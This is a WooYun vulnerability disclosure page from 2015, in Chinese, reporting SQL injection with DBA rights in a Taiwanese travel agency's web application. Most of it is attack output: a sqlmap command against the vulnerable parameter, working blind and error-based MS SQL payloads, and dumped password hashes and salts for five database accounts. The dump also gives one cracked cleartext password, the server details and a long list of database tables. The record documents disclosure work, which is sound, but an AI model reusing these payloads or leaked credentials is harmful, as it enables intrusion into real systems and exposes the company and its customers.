当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153062

漏洞标题:百威旅遊某處存在SQL注射漏洞(DBA權限,系統管理員密碼泄露,1843個表)(臺灣地區)

相关厂商:百威旅遊

漏洞作者: 路人甲

提交时间:2015-11-09 16:29

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-09: 细节已通知厂商并且等待厂商处理中
2015-11-17: 厂商已经确认,细节仅向厂商公开
2015-11-27: 细节向核心白帽子及相关领域专家公开
2015-12-07: 细节向普通白帽子公开
2015-12-17: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

百威旅遊某處存在SQL注射漏洞(DBA權限,系統管理員密碼泄露,1843個表,1000多萬系統信息泄露)

详细说明:

地址:http://**.**.**.**/eWeb/GO/L_GO_List.asp?mgrup_cd=KUL56&s_year=2015&s

python sqlmap.py -u "http://**.**.**.**/eWeb/GO/L_GO_List.asp?mgrup_cd=KUL56&s_year=2015&s" -p mgrup_cd --technique=BE --random-agent --batch -D TRDATA -T OTB_CMS_CTR --count --columns


1. DBA权限,系统管理员密码泄露

current user:    'cowell'
current user is DBA: True
database management system users [5]:
[*] bwt
[*] cowell
[*] cowell2
[*] cowell3
[*] sa
database management system users password hashes:
[*] bwt [1]:
password hash: 0x0100aeba613bf39a75439d991f72ce32fff43e690779b5e053bc
header: 0x0100
salt: aeba613b
mixedcase: f39a75439d991f72ce32fff43e690779b5e053bc
[*] cowell [1]:
password hash: 0x010039ddfc0c613b88b2e240a18ac3f1e30f265917b6741b907c
header: 0x0100
salt: 39ddfc0c
mixedcase: 613b88b2e240a18ac3f1e30f265917b6741b907c
clear-text password: tr2000
[*] cowell2 [1]:
password hash: 0x010087850a1e6124d9a321f7723ef45ec41f4f534af4b7f88105
header: 0x0100
salt: 87850a1e
mixedcase: 6124d9a321f7723ef45ec41f4f534af4b7f88105
[*] cowell3 [1]:
password hash: 0x0100fef5740e343b766a41a8d1df6cd30395d5ae79444c371f47
header: 0x0100
salt: fef5740e
mixedcase: 343b766a41a8d1df6cd30395d5ae79444c371f47
[*] sa [1]:
password hash: 0x01004086ceb6d2fa1bdb1c5505d6f0c6d9bf54da7ce34a29e667
header: 0x0100
salt: 4086ceb6
mixedcase: d2fa1bdb1c5505d6f0c6d9bf54da7ce34a29e667


2. 一千多万系统信息泄露

Database: TRDATA
Table: OTB_CMS_CTR
[17 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| ad_main | nvarchar |
| ad_middle | nvarchar |
| ad_sub | nvarchar |
| GUID | char |
| HTTP_REFERER | varchar |
| HTTP_REFERER2 | varchar |
| key_main | nvarchar |
| key_middle | nvarchar |
| key_sub | nvarchar |
| LoginTime | datetime |
| QUERY_STRING | varchar |
| REMOTE_ADDR | varchar |
| Server_Name | varchar |
| StayTime | varchar |
| UnLoadTime | datetime |
| URL | varchar |
| UserAgent | varchar |
+---------------+----------+
Database: TRDATA
+-----------------+---------+
| Table | Entries |
+-----------------+---------+
| dbo.OTB_CMS_CTR | 11365594 |
+-----------------+---------+

漏洞证明:

---
Parameter: mgrup_cd (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: mgrup_cd=KUL56' AND 6432=6432 AND 'MgXv'='MgXv&s_year=2015&s
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: mgrup_cd=KUL56' AND 1315=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(118)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (1315=1315) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(98)+CHAR(113))) AND 'OEAp'='OEAp&s_year=2015&s
---
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, Microsoft IIS 8.5, ASP
back-end DBMS: Microsoft SQL Server 2005
current user: 'cowell'
current user is DBA: True
database management system users [5]:
[*] bwt
[*] cowell
[*] cowell2
[*] cowell3
[*] sa
database management system users password hashes:
[*] bwt [1]:
password hash: 0x0100aeba613bf39a75439d991f72ce32fff43e690779b5e053bc
header: 0x0100
salt: aeba613b
mixedcase: f39a75439d991f72ce32fff43e690779b5e053bc
[*] cowell [1]:
password hash: 0x010039ddfc0c613b88b2e240a18ac3f1e30f265917b6741b907c
header: 0x0100
salt: 39ddfc0c
mixedcase: 613b88b2e240a18ac3f1e30f265917b6741b907c
clear-text password: tr2000
[*] cowell2 [1]:
password hash: 0x010087850a1e6124d9a321f7723ef45ec41f4f534af4b7f88105
header: 0x0100
salt: 87850a1e
mixedcase: 6124d9a321f7723ef45ec41f4f534af4b7f88105
[*] cowell3 [1]:
password hash: 0x0100fef5740e343b766a41a8d1df6cd30395d5ae79444c371f47
header: 0x0100
salt: fef5740e
mixedcase: 343b766a41a8d1df6cd30395d5ae79444c371f47
[*] sa [1]:
password hash: 0x01004086ceb6d2fa1bdb1c5505d6f0c6d9bf54da7ce34a29e667
header: 0x0100
salt: 4086ceb6
mixedcase: d2fa1bdb1c5505d6f0c6d9bf54da7ce34a29e667


<code>available databases [9]:
[*] master
[*] model
[*] msdb
[*] RITDB
[*] tempdb
[*] TNSEDB
[*] TRAIR
[*] TRDATA
[*] TRDATA_BK
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mgrup_cd (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: mgrup_cd=KUL56' AND 6432=6432 AND 'MgXv'='MgXv&s_year=2015&s
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: mgrup_cd=KUL56' AND 1315=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(118)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (1315=1315) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(98)+CHAR(113))) AND 'OEAp'='OEAp&s_year=2015&s
---
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, Microsoft IIS 8.5, ASP
back-end DBMS: Microsoft SQL Server 2005
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mgrup_cd (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: mgrup_cd=KUL56' AND 6432=6432 AND 'MgXv'='MgXv&s_year=2015&s
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: mgrup_cd=KUL56' AND 1315=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(118)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (1315=1315) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(98)+CHAR(113))) AND 'OEAp'='OEAp&s_year=2015&s
---
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, Microsoft IIS 8.5, ASP
back-end DBMS: Microsoft SQL Server 2005
current database: 'TRDATA'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mgrup_cd (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: mgrup_cd=KUL56' AND 6432=6432 AND 'MgXv'='MgXv&s_year=2015&s
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: mgrup_cd=KUL56' AND 1315=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(118)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (1315=1315) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(98)+CHAR(113))) AND 'OEAp'='OEAp&s_year=2015&s
---
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, Microsoft IIS 8.5, ASP
back-end DBMS: Microsoft SQL Server 2005
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mgrup_cd (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: mgrup_cd=KUL56' AND 6432=6432 AND 'MgXv'='MgXv&s_year=2015&s
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: mgrup_cd=KUL56' AND 1315=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(118)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (1315=1315) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(98)+CHAR(113))) AND 'OEAp'='OEAp&s_year=2015&s
---
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, Microsoft IIS 8.5, ASP
back-end DBMS: Microsoft SQL Server 2005
Database: TRDATA
[1843 tables]
+----------------------------------+
| AA |
| CMCOPMA |
| CMPCSMD |
| CMPURMA |
| DCL_TNGRUP_GO |
| DC_TNAREA_GO |
| DC_TNGRUP_GO |
| DC_TNSUBD_GO |
| DIFFCNTA |
| DLLDEBUGMSG |
| EMPGROUP |
| EMPGROUPD |
| FITARAP |
| GRUPAR |
| GTA_AOTDATA |
| GTA_CITY |
| IF_IDMAP |
| Log |
| LogForGrpWebPD |
| MPBLOCK |
| MPDTL |
| MPGRP |
| MPGRPDTL |
| MPGRPEMP |
| MPHOME |
| MPLINK |
| MPPMD |
| MPPROMO |
| MPSET |
| MPSITEADM |
| MPSITEDEFEMP |
| MPSITEDEFEMPLOG |
| MPSITEDEFRULE |
| MPSITEDTL |
| MPSITEEMPLOG |
| MPSITEMAIL |
| MPSTATICURL |
| MPTRACKLST |
| MPUSRORDLST |
| MPUSRSDRULE |
| NCNTA |
| OTB_ACT_ClassOrderBy |
| OTB_ACT_HK2014Designer |
| OTB_ACT_HK2014DesignerLiker |
| OTB_ACT_HK2014DesignerPhoto |
| OTB_ACT_HotIssue |
| OTB_ACT_HotIssue_ClassSetting |
| OTB_ACT_HotIssue_Dept |
| OTB_ACT_HotIssue_Sub |
| OTB_ACT_HotIssue_Sub1 |
| OTB_ACT_HotIssue_TypeSetting |
| OTB_ACT_Vacation |
| OTB_ADV_TvlKnow |
| OTB_ADV_TvlMGroup |
| OTB_ADV_TvlMGroupProm |
| OTB_ADV_TvlPage |
| OTB_ADV_TvlProm |
| OTB_ADV_TvlProm_BK |
| OTB_ADV_TvlShop |
| OTB_ADV_TvlShopClass |
| OTB_ADV_TvlShopRegion |
| OTB_CMS_Arguments |
| OTB_CMS_BasePSWD |
| OTB_CMS_CTR |
| OTB_CMS_CTR_Action |
| OTB_CMS_CTR_Class |
| OTB_CMS_CTR_Detail |
| OTB_CMS_CTR_Inside |
| OTB_CMS_NextTravel |
| OTB_CMS_PhoneSurvey |
| OTB_CMS_PhoneSurveyForB2E |
| OTB_CMS_PhoneSurveyForB2E_Record |
| OTB_CMS_RepArguments |
| OTB_CMS_TRUSR |
| OTB_CMS_TRUSR_GaryTest |
| OTB_CMS_Travelline |
| OTB_CMS_TvlService |
| OTB_CMS_TvlService_Old |
| OTB_DES_Prom |
| OTB_DES_PromSub |
| OTB_DES_PromSub_BackUp |
| OTB_DES_Shop |
| OTB_DES_ShopClass |
| OTB_DES_ShopDept |
| OTB_DES_ShopPicture |
| OTB_DES_ShopRegion |
| OTB_DES_Tag |
| OTB_DES_Tag_BackUp |
| OTB_DES_Tag_Base |
| OTB_DES_Tag_UpdLog |
| OTB_Daily_Log |
| OTB_EXP_EZSheet1 |
| OTB_EXP_EZSheet2 |
| OTB_EXP_EZSheet3 |
| OTB_EXP_EZSheet4 |
| OTB_EXP_EZSheet5 |
| OTB_EXP_EZSheet6 |
| OTB_EXP_EZSheet7 |
| OTB_EXP_EZSheet_ErrorLog |
| OTB_EXP_EZSheet_TempGrup |
| OTB_EXP_EZSheet_TempImg |
| OTB_Free_AirPkg_AirPlane |
| OTB_Free_AirPkg_Arguments |
| OTB_Free_AirPkg_CabnInfo |
| OTB_Free_AirPkg_ECShelve |
| OTB_Free_AirPkg_FlyRBD |
| OTB_Free_AirPkg_FlySegment |
| OTB_Free_AirPkg_HTL |
| OTB_Free_AirPkg_HTLPrice |
| OTB_Free_AirPkg_HTLRmtp |
| OTB_Free_AirPkg_HotlRef |
| OTB_Free_AirPkg_Manage |
| OTB_Free_AirPkg_Optional |
| OTB_Free_AirPkg_TktPrice |
| OTB_Free_AirPkg_Tktextra |
| OTB_Free_AirPkg_TourList |
| OTB_Free_AirPkg_TourList_Daily |
| OTB_Free_AirPkg_Trip |
| OTB_Free_AirPkg_TripRBD |
| OTB_Free_AirPkg_TripSegment |
| OTB_Free_AirPkg_XMLUpdateList |
| OTB_Free_Airpkg_FlyDiffInOut |
| OTB_IDX_Commodity |
| OTB_IDX_Commodity1 |
| OTB_IDX_CommodityProm |
| OTB_IDX_DeptCity |
| OTB_IDX_ECShelve |
| OTB_IDX_KeyWord |
| OTB_IDX_KeyWordTemp |
| OTB_IDX_SGroup |
| OTB_IDX_SGroupClass |
| OTB_IDX_SGroupClassTest |
| OTB_IDX_SGroupClass_old |
| OTB_IDX_SGroupRegion |
| OTB_IDX_TRGRUP |
| OTB_IDX_TRGRUPTemp |
| OTB_MEM_ForgetPSWD |
| OTB_MNG_Announcement |
| OTB_MNG_Announcement_Log |
| OTB_ODR_Contract |
| OTB_ODR_Contract_His |
| OTB_ODR_Contract_HisV3 |
| OTB_ODR_Contract_His_V2 |
| OTB_ODR_Contract_V2 |
| OTB_PRJ_MeetingRecord |
| OTB_SYS_ArgumentClass |
| OTB_SYS_Arguments |
| OTB_SYS_Attachments |
| OTB_SYS_Authorize |
| OTB_SYS_DMAdv |
| OTB_SYS_Departments |
| OTB_SYS_Dept |
| OTB_SYS_DeptClass |
| OTB_SYS_Document |
| OTB_SYS_Document1 |
| OTB_SYS_Document_BK |
| OTB_SYS_Document_Temp |
| OTB_SYS_Document_Trash |
| OTB_SYS_DropDownList |
| OTB_SYS_Email |
| OTB_SYS_EmailSetting |
| OTB_SYS_EmailTest |
| OTB_SYS_Emaillog |
| OTB_SYS_EmaillogTemp |
| OTB_SYS_EzTravelCode |
| OTB_SYS_EzTravelCode1 |
| OTB_SYS_Jobtitle |
| OTB_SYS_Log |
| OTB_SYS_LogTrigger |
| OTB_SYS_MaxNumber |
| OTB_SYS_Members |
| OTB_SYS_MembersBase |
| OTB_SYS_MembersToRule |
| OTB_SYS_ModuleList |
| OTB_SYS_PersonalGridManage |
| OTB_SYS_ProgramList |
| OTB_SYS_Rules |
| OTB_SYS_SMSDaily |
| OTB_SYS_SMSErrorLog |
| OTB_SYS_SMSListTest |
| OTB_SYS_SystemSetting |
| OTB_SYS_TableDirectory |
| OTB_SYS_Zdividual |
| OTB_SYS_Ztable |
| OTB_airpkg_BR_AddlChrg |
| OTB_airpkg_BR_BasicCls |
| OTB_airpkg_BR_BccPrice |
| OTB_airpkg_BR_BkgSeg |
| OTB_airpkg_BR_BlkOutDt |
| OTB_airpkg_BR_DiffInOutPrice |
| OTB_airpkg_BR_Fare |
| OTB_airpkg_BR_HighSeasonPrice |
| OTB_airpkg_BR_Hotel |
| OTB_airpkg_BR_Option |
| OTB_airpkg_BR_Pkg |
| OTB_airpkg_BR_PkgItiItem |
| OTB_airpkg_BR_RoomItem |
| OTB_airpkg_BR_StvrPrice |
| OTB_airpkg_BR_TktAddPrice |
| OTB_airpkg_BR_TktTax |
| OTB_airpkg_BR_TmChgPrice |
| OTB_airpkg_BR_Tour |
| OTB_airpkg_BR_UpgPrice |
| OTB_airpkg_BR_WeekendPrice |
| OTB_airpkg_hotl |
| OTB_airpkg_index |
| OTB_airpkg_price |
| OTB_airpkg_rmtp |
| OTB_airpkg_tkc |
| OTB_airpkg_tkh |
| OTB_airpkg_tko |
| OTB_airpkg_tktextra |
| OTB_airpkg_tku |
| OTB_airpkg_tour |
| OTB_airpkg_trip |
| OVW_Airpkg_Area |
| OVW_CMS_PhoneSurvyForB2E |
| OVW_Cms_AreaSort |
| OVW_Cms_Arguments |
| OVW_Cms_MainTB |
| OVW_Cms_PhoneSurvey |
| OVW_Cms_TvlService |
| OVW_Free_Airpkg_AirLine |
| OVW_Free_Airpkg_AllCity |
| OVW_Free_Airpkg_Area |
| OVW_Free_Airpkg_City |
| OVW_Free_Airpkg_DeptCity |
| OVW_Free_Airpkg_HTLSource |
| OVW_Free_Airpkg_Index |
| OVW_Free_Airpkg_RoomPrice |
| OVW_Free_Airpkg_TktPrice |
| OVW_IDX_TRGRUP |
| OVW_OT_Air_ArrvArea |
| OVW_OT_Air_ArrvCity |
| OVW_OT_Air_DeptCity |
| OVW_OT_Air_Index |
| OVW_OT_Air_RoomPrice |
| OVW_reporttest |
| OVW_reporttest2 |
| PCDR00 |
| PMBR00 |
| RGQTY |
| SALESGRP |
| SEL_TNGRUP_GO |
| SE_TNAREA_GO |
| SE_TNGRUP_GO |
| SE_TNSUBD_GO |
| SITEPAYADM |
| TBLBBC_ACCOUNT |
| TBLBBC_ACCOUNT_LOGO |
| TBLBBC_ACCOUNT_TRREC |
| TBLBBC_G_D_SEARCH |
| TBLBBC_G_S_SEARCH |
| TBLBBC_PG_D_SEARCH |
| TBLBBC_PG_S_SEARCH |
| TBLORDER |
| TBLORDERPAX |
| TBLUSER |
| TBL_G_New_BBS |
| TBL_G_New_BBS_AutoEmailLog |
| TBL_G_New_DISCOUNT |
| TBL_G_New_Daily |
| TBL_G_New_Daily_Alert |
| TBL_G_New_Daily_Note |
| TBL_G_New_FET |
| TBL_G_New_FET_ORDER_MAIN |
| TBL_G_New_FET_ORDER_PAX |
| TBL_G_New_ITN_EXCLUDE |
| TBL_G_New_ITN_INCLUDE |
| TBL_G_New_ITN_ITN |
| TBL_G_New_ITN_REMARK |
| TBL_G_New_ITN_TICKET |
| TBL_G_New_LC_REMARK |
| TBL_G_New_MSG_DTL |
| TBL_G_New_MSG_DTL_HIDE |
| TBL_G_New_MSG_DTL_REQ |
| TBL_G_New_MSG_DTL_REQLOG |
| TBL_G_New_MSG_MAIN |
| TBL_G_New_PROMISE |
| TBL_G_New_Tasklist_Check |
| TBL_G_New_Tasklist_Config |
| TBL_G_New_Tasklist_Note |
| TBL_G_New_UpdLog |
| TBL_G_New_VISA |
| TBL_MG_New_DISCOUNT |
| TBL_MG_New_Daily |
| TBL_MG_New_Daily_Alert |
| TBL_MG_New_Daily_Note |
| TBL_MG_New_ITN_EXCLUDE |
| TBL_MG_New_ITN_INCLUDE |
| TBL_MG_New_ITN_ITN |
| TBL_MG_New_ITN_REMARK |
| TBL_MG_New_ITN_TICKET |
| TBL_MG_New_TAG_Log |
| TKTSALE103643 |
| TKTSALE121155 |
| TKTSALE135322 |
| TKTSALE135343 |
| TKTSALE152233 |
| TKTSALE164633 |
| TNCARR_GO_AGT |
| TNCARR_GO_ASP |
| TNDEPLOC_GO_AGT |
| TNDEPLOC_GO_ASP |
| TNDPCGOIDXMAIN |
| TNDPCGOIDXPRICE |
| TNDPCGOIDXREGN |
| TNPORT_GO_AGT |
| TNPORT_GO_ASP |
| TNPRICE_GO_AGT |
| TNPRICE_GO_ASP |
| TNREG2_GO_AGT |
| TNREG2_GO_ASP |
| TNREGM_GO_AGT |
| TNREGM_GO_ASP |
| TNSEDBLOG |
| TNTDAY_GO_AGT |
| TNTDAY_GO_ASP |
| TNXMLLog |
| TR1BTARRPCC |
| TR1GTARRPCC |
| TRA1GAGT |
| TRA1GAGTLOC |
| TRA1GAREA |
| TRA1GATT |
| TRA1GMEET |
| TRA1GRUP |
| TRA1GTVSA |
| TRA1INV |
| TRA1INVD |
| TRA1LOC1 |
| TRA1LOC2 |
| TRA1TRANS |
| TRABANK |
| TRABSN |
| TRACCT |
| TRACCTBASIC |
| TRACCTD |
| TRACCTDETAIL |
| TRACCTPRINTLIST |
| TRACCT_VC |
| TRACNT |
| TRACNTH |
| TRACNTLOG |
| TRACNTSUBJ |
| TRADDR |
| TRADEPT |
| TRADJTAX |
| TRADRESS |
| TRAFFIC |
| TRAGCODE |
| TRAGT |
| TRAGTBLV |
| TRAGTC |
| TRAGTCLOG |
| TRAGTDIY |
| TRAGTLOG |
| TRAIRP |
| TRAIRP_DC |
| TRAIRTEL |
| TRALBUM |
| TRALTERNATE |
| TRALTERNATED |
| TRAORD |
| TRAORDD |
| TRAORDDLITE |
| TRAORDLITE |
| TRAORDP |
| TRAPEPNRATE |
| TRAPEPNSET |
| TRAPEPNSETLOG |
| TRAPEPNTC |
| TRAPEPNTCLOG |
| TRAPEPNTCORD |
| TRAPILOG |
| TRAPPAYNO |
| TRAPUN |
| TRAREA |
| TRASP |
| TRATMALOG |
| TRATMLOG |
| TRATPCOLOG |
| TRATPCOXMLLOG |
| TRAWB |
| TRAWBD |
| TRAWBTRANS |
| TRAWBTRANSD |
| TRBACNT |
| TRBALN |
| TRBAMCFG |
| TRBANK |
| TRBBS |
| TRBBSD |
| TRBCCREF |
| TRBCTS |
| TRBLACKLIST |
| TRBNSEVENT |
| TRBNSEVENTPAX |
| TRBNSLOG |
| TRBNSPATTERN |
| TRBNSPRCLOGD |
| TRBNSPROCLOG |
| TRBONUS |
| TRBONUSDISC |
| TRBONUSLOG |
| TRBOOKB |
| TRBOOKD |
| TRBOOKT |
| TRBORD |
| TRBORDD |
| TRBRADDUNIT |
| TRBRTAREA |
| TRBSP |
| TRBSPT |
| TRBUSSEAT |
| TRBUSTP |
| TRCAR |
| TRCARDBANK |
| TRCARDQUERY |
| TRCARDREF |
| TRCAREA |
| TRCARR |
| TRCARRAGENT |
| TRCARRSQ |
| TRCDSYS |
| TRCEDP |
| TRCHKP |
| TRCHKPD |
| TRCHKR |
| TRCHKRD |
| TRCHLGRPIDX |
| TRCHNL |
| TRCHNLACCT |
| TRCHNLCONFIG |
| TRCHNLDTL |
| TRCHNLHOTQT |
| TRCHNLPAX |
| TRCHNLPRD |
| TRCHNLPRDTP |
| TRCHNLURL |
| TRCHNLUSEDPRD |
| TRCITY |
| TRCITYAREA |
| TRCITYDTL_TW |
| TRCITYHTL |
| TRCITYINTRO |
| TRCITYLOC |
| TRCITYTRFIC |
| TRCITY_TW_DC |
| TRCKBANK |
| TRCLAS |
| TRCLOCATION |
| TRCMSMSG |
| TRCMSMSGD |
| TRCNTA |
| TRCNTA_BACKUP |
| TRCNTA_CHK_EMAIL |
| TRCOMCT |
| TRCOMP |
| TRCOMPACNT |
| TRCOMPINIT |
| TRCOMPPROV |
| TRCOMPR |
| TRCOMPREFER |
| TRCOMPREG |
| TRCOMPRETN |
| TRCOMPRETNDETAIL |
| TRCOMPRFCOMM |
| TRCOMPRFCOMMD |
| TRCOMPSHIP |
| TRCOMPSHIPDETAIL |
| TRCOMPSPAVG |
| TRCOMPSPCOMM |
| TRCOMPSPSTORE |
| TRCOMPSUBJ |
| TRCOMPTKT |
| TRCOMPTOUR |
| TRCOMPTOURD |
| TRCOMPTOURRATE |
| TRCONTACT |
| TRCORD |
| TRCORDD |
| TRCOTKMKU |
| TRCOUNTY |
| TRCPCLS |
| TRCPFLD |
| TRCPIMG |
| TRCPITN |
| TRCPLFLD |
| TRCPLRULE |
| TRCPLRULED |
| TRCPMCLS |
| TRCPMSLN |
| TRCPN |
| TRCPORULED |
| TRCPPRSORD |
| TRCPPRSORDD |
| TRCPRORD |
| TRCPRORDD |
| TRCPRORDDTKT |
| TRCPRULE |
| TRCPRULED |
| TRCPSUBD |
| TRCPSUBDRULE |
| TRCPTKT |
| TRCPTKTLOG |
| TRCPTKTPROC |
| TRCPTKTPROCD |
| TRCPTKTRULE |
| TRCREC |
| TRCREDACCT |
| TRCREDBANKRT |
| TRCRSRULE |
| TRCRUISE |
| TRCUP |
| TRCURLOG |
| TRCURR |
| TRCURRDAY |
| TRCURREX |
| TRCURR_CONTRACT |
| TRDAITN |
| TRDAPR |
| TRDAPRD |
| TRDBAT |
| TRDBATD |
| TRDBATL |
| TRDBATV |
| TRDBIT |
| TRDBRM |
| TRDBRMT |
| TRDCM |
| TRDEFAULT |
| TRDEPFMG |
| TRDEPLOC |
| TRDEPT |
| TRDESC |
| TRDEVICE |
| TRDGCLN |
| TRDGHTL |
| TRDGINC |
| TRDGINS |
| TRDGITN |
| TRDGPAX |
| TRDGRES |
| TRDGSC |
| TRDGTRB |
| TRDGTRF |
| TRDGVS |
| TRDIVGC |
| TRDIVGCD |
| TRDIYRQFRM |
| TRDOCU |
| TRDORD |
| TRDORDD |
| TRDPCRO |
| TRDPRC |
| TRDPRINT |
| TRDREC |
| TRDRIVER |
| TRDSYS |
| TRDTSUBD |
| TRDTSUBDAMS |
| TRDTSUBDTMP |
| TRDTSUBDTP |
| TRDVPAREA |
| TRDVPAREATP |
| TRDVPRECORD |
| TRDVPTARGET |
| TRDVPVISIT |
| TREAILOG |
| TREAPR |
| TRECLAS |
| TREDCP |
| TREDFLD |
| TREDFM |
| TREDFMAD |
| TREDFMF |
| TREDMAD |
| TREDPAX |
| TREDPFD |
| TREDUTY |
| TREFOM |
| TREHSLOG |
| TREHSLOGDTL |
| TREITM |
| TRELCLS |
| TRELEAV |
| TREMP |
| TREMPALTERNATE |
| TREMUSERLOG |
| TRENGL |
| TRENTRY |
| TREPCOND |
| TREPCONDD |
| TREPCONDDH |
| TREPCONDH |
| TREPDTL |
| TREPEWEB |
| TREPHIST |
| TREPHTML |
| TREPMAIN |
| TREPMEMBER |
| TREPNTC |
| TREPNTCLOG |
| TREPNTCORD |
| TREPRULE |
| TREPRULED |
| TREPSENDER |
| TRESAL |
| TRESGRUP |
| TREVAHPNR |
| TREWORK |
| TREXCHANGE |
| TRFACT |
| TRFARE |
| TRFCAR |
| TRFLT |
| TRFORD |
| TRFORDD |
| TRFORMULA |
| TRFPITN |
| TRGACNTTMP |
| TRGAREA |
| TRGAREABITN |
| TRGAREASALETOPIC |
| TRGBAWB |
| TRGBMINAM |
| TRGBONUSTMP |
| TRGBOOK |
| TRGCAR |
| TRGCARD |
| TRGCARP |
| TRGCHANNEL |
| TRGCHGITN |
| TRGCPTKT |
| TRGCTRL |
| TRGCTRLAD |
| TRGCTRLLOG |
| TRGDAY |
| TRGDAYAD |
| TRGDAYLOG |
| TRGDBUS |
| TRGDBUSSEAT |
| TRGDISCT |
| TRGDISCTLOG |
| TRGDLOG |
| TRGDROOM |
| TRGDROUT |
| TRGESTM |
| TRGFAKELST |
| TRGFCAR |
| TRGFCARITN |
| TRGHTL |
| TRGINS |
| TRGITN |
| TRGITNSCEN |
| TRGITNTRAF |
| TRGLOCL |
| TRGOPITEM |
| TRGORK |
| TRGPAX |
| TRGPAXKEEP |
| TRGPAXLOG |
| TRGPNR |
| TRGPUBDLOG |
| TRGPUBODLOG |
| TRGPVOUR |
| TRGQTY |
| TRGQTYAD |
| TRGQTYLOG |
| TRGREPAST |
| TRGREQLOG |
| TRGROOM |
| TRGROUPCONTENTS |
| TRGRUP |
| TRGRUPCALC |
| TRGRUPCALCDTL |
| TRGRUPCOMPCOMM1 |
| TRGRUPCOMPCOMM2 |
| TRGRUPCOMPCOMM3 |
| TRGRUPD1 |
| TRGRUPDISC |
| TRGRUPFEAT |
| TRGRUPHCALC |
| TRGRUPHCALCDTL |
| TRGRUPKEEP |
| TRGRUPMERGE |
| TRGRUPPOOL |
| TRGRUPREG |
| TRGRUPSEAT |
| TRGRUPSPACT |
| TRGRUPSPACTLOG |
| TRGRUPSUBD |
| TRGRUPUN |
| TRGRUP_GPAX_AM_0032 |
| TRGRUP_GPAX_AM_0261 |
| TRGRUP_GPAX_AM_0318 |
| TRGRUP_GPAX_AM_0818 |
| TRGRUP_GPAX_AM_0905 |
| TRGRUP_P19 |
| TRGRUP_PROFIT |
| TRGRUP_PROFIT2_0247 |
| TRGRUP_PROFIT2_9999 |
| TRGRUP_PROFITPORD_0247 |
| TRGRUP_PROFITPORD_9999 |
| TRGSA |
| TRGSACOST |
| TRGSAITKT |
| TRGSALE |
| TRGSALEDTL |
| TRGSALEPAX |
| TRGSALEPAXM |
| TRGSALERULE |
| TRGSALERULED |
| TRGSAREC |
| TRGSARTKT |
| TRGSATKT |
| TRGSCEN |
| TRGSENDLOG |
| TRGTAXAR |
| TRGTOURBUS |
| TRGTRAFFIC |
| TRGUESTBOOK |
| TRGUIDASSIGN |
| TRGUIDER |
| TRGVISA |
| TRGVOUR |
| TRHBAMCFG |
| TRHCHGITN |
| TRHCSTDEPT |
| TRHDTL_RSVT |
| TRHFFORM |
| TRHFMLY |
| TRHGROSS |
| TRHINSAM |
| TRHOFAPPLY |
| TRHOLI |
| TRHOLIWK |
| TRHOPEMP |
| TRHPAYRULE |
| TRHPRIV |
| TRHROOMFULL |
| TRHROOMQTTMP |
| TRHROOMSUBDTMP |
| TRHROOMSUBDTMPD |
| TRHSUBAD |
| TRHSUBD |
| TRHSUBDLOG |
| TRHSUBDSYS |
| TRHSUPPLIER |
| TRHTL |
| TRHTLASGNLOG |
| TRHTLASSIGN |
| TRHTLBR |
| TRHTLCHAIN |
| TRHTLCHAINREL |
| TRHTLCONTRACT |
| TRHTLCURR |
| TRHTLDEVICE |
| TRHTLIMG |
| TRHTLLUN |
| TRHTLMROOM |
| TRHTLPIC |
| TRHTLQY |
| TRHTLRMD |
| TRHTLROOM |
| TRHTLROOMKEEP |
| TRHTLROOMPLAN |
| TRHTLROOMQT |
| TRHTLSORT |
| TRIBTMINS |
| TRIBTMKUP |
| TRIBTROUT |
| TRICPTKT |
| TRIDERR |
| TRIMGFDB |
